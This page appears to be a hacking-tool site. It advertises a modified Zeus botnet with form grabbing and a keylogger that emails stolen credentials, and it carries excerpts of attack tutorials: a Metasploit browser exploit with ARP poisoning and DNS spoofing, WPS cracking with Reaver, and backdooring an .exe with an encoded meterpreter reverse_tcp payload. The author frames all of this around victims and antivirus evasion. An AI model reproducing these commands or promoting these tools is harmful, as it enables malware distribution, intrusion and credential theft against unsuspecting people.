Welcome CasperFriends

Get free trial (only for today)

Get CasperLauncher Get CasperSpy
  • Casperlauncher
  • CasperSpy
  • CasperDroid
  • CasperLogger


CasperLauncher is a Hacking Framework Interface built for Windows. it’s most Complete Security Tools Package

The only Hacking Framework With Complete Guides | Tutorial | Video Tutorial. All tools in CasperLauncher equipped by Tutorial and Guide How to use it CasperLauncher is distributed in the hope that it will be useful.

Read More


Stealth Botnet

CasperSpy is a new generation of zeus botnet created by modifying Zeus source code add new module to improve capabilities such as: polymorphic infection,spread itself and form grabbing for chrome browser to make it more dangerous and more difficult to detect

Read More


First mobile botnet ever made

Our team is still working on this project we've reached the final stage. hope this project will be finished on time. Coming soon on Android

We'll notified you via email when it ready

Stealth Email Keylogger

is Open source email keylogger. Casperlogger will send login credentials data to your email

you can modified source code of this tool to improve capabilities at Keylogger directory on CasperLauncher

Read More

Tag Archives: metasploit

Steal Login Credentials with Metasploit Exploit Browser

[blockquote cite="Assaf Nitzan"] I’ll try to be nicer if you try to be smarter. [/blockquote]


Its been a while since i did a SET (Social-Engineering Toolkit) demonstration, i am here to fix that guilt.
So for today let us go through
Website Attack Vector – > Metasploit Browser Exploit Method.
You may download the PDF version of this tutorial here.

Download as PDF

Metasploit Browser Exploit Method :
The Metasploit browser exploit method will utilize select Metasploit browser exploits
through an iframe and deliver a Metasploit payload.

We will be using SET to load up the browser exploit modules and ettercap -G
to do a man in the middle attack through arp poisoning. And finally activating of the dns spoof plugin.

Yes i am aware that we can do all that in command line but the reason i am doing it this way is because
i tend to like flipping through the various plugins, ADHD, itchy fingers….call it what you will.
In my opinion it does not make much difference what method you use as long the job gets done.

Lets Begin

1) On a terminal type : cd /pentest/exploits/set

2) To load SET, type : ./set

3) Choose 1 for Social-Engineering Attacks.

4) Next choose 2 for Website Attack Vector.

Read more ...

Crack WIFI Protected Setup: Brute force attack against Wifi Protected Setup using Reaver Part2

Brute force attack against Wifi Protected Setup using Reaver


You have to read previous part here

So i have already shown you guys the difficult method to crack a wpa/wpa2 (laughs),
so i guess its time to show you how to attempt to crack a wpa/wpa2 network key without a word list.
Yea go on curse me, “Why didnt this bastard teach that first then!!!” …mostly for personal pleasure lol.

Ok Ok so the awesome tool we will be introducing in this tutorial is call Reaver.
Reaver was made by Craig Heffner from Tactical Network Solutions.

In the old method , we used a dictionary attack against our target but with reaver
we will be doing a brute force (More Potent) attack on the target WPS.
It took me around 2-3 hours to crack my 8 digit pin which beats using a word list.
I have spent a week trying to crack with a word list and still failed.

So why do we still use word list? Well reaver only works on routers that have WPS enabled.
If you are worried about having your router pin brute forced, then simply disable WPS.
You may download the PDF version of this tutorial here.

How it works?
Reaver exploits a protocol design flaw in WiFi Protected Setup (WPS).
This vulnerability exposes a side-channel attack against Wi-Fi Protected Access
(WPA) versions 1 and 2 allowing the extraction of the Pre-Shared Key (PSK) used to secure the network.

WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase.
When a user supplies the correct PIN the access point essentially gives
the user the WPA/WPA2 PSK that is needed to connect to the network.

Reaver will determine an access point’s PIN and then extract the PSK and give it to the attacker.

Tools used

Lets Begin

1) Open a terminal and type : airmon-ng start wlan0

2) Next type : airodump-ng mon0

3) The screen shown below appears, press Ctrl-C to stop.

4) Copy the target BSSID. I highlighted mine.

Read more ...

The Power of Combination Nmap and Metasploit

[blockquote cite="CasperFriends"] i'm just a normal person until me and you become us [/blockquote]

The objective of todays tutorial is to show you how to save your nmap scan (.xml) and to upload it to your metasploit framework. This is one of the best ways to save time when attacking a large network / ip range. So here we go.

You may download the PDF version of this tutorial here.
Lets Begin:

1) First i am going to perform a quick scan with nmap : nmap -T4 -F -oX savedscan.xml

2) -oX (.XML output file name).

3) As shown in the image below, my scan has been saved as savedscan.xml.

4) Next load up msfconsole.

Read more ...

Inject Backdoor into .exe file using Metasploit Payload


How was the weekend?? All good and hung over? Good!

For today a tutorial on how to backdoor any .EXE file with msfpayload. About a decade ago
when i first discovered RAT (Remote Administration Tool) programs, i had to go through various binders, crypters and icon changers to try and successfully bind an .EXE with an exploit or malware.

Finding an undetectable RAT was an even bigger problem. Of course back then my programming skills were beyond shit for me to whip up a stable undetectable RAT, so plan B was to whip up a shitty winsock program in Visual Basic.

It was a horrible, unstable program but it was undetectable and i could bind it with the .EXE without any worry of AV detection. It did enough to get me access into the victims computer long enough so i could modify the AV files and upload a working stable detectable RAT. Oh fun times!!

But how time flies!. Thanks to the beauty that is Metasploit, we can now backdoor any .EXE file!

NOTE: This tutorial will only demonstrate how to bind an .exe with a metasploit payload. I will not be explaining the ways to get your victims to execute it. Your creativity is your duty. You may download the PDF version of this tutorial here.

Lets Begin :

1) Locate your .exe and place it in your Home directory as shown below.

2) To list the available payloads, type : msfpayload -l.

3) As shown below, we will be using windows/meterpreter/bind_tcp.

4) Syntax to bind file : msfpayload <payload> <LHOST=>< LPORT= >R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x <.exe location> -o <output file name>.

5) So in my case i would type : msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=666 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x/root/devcpp-setup.exe -o /root/dedcpp-modified.exe.

6) I have instructed msfpayload to bind my .exe with a meterpreter/reverse_tcp payload and to encode it 6 times with x86/shikata_ga_nai. It is also set to establish a connection to my port 666.

Read more ...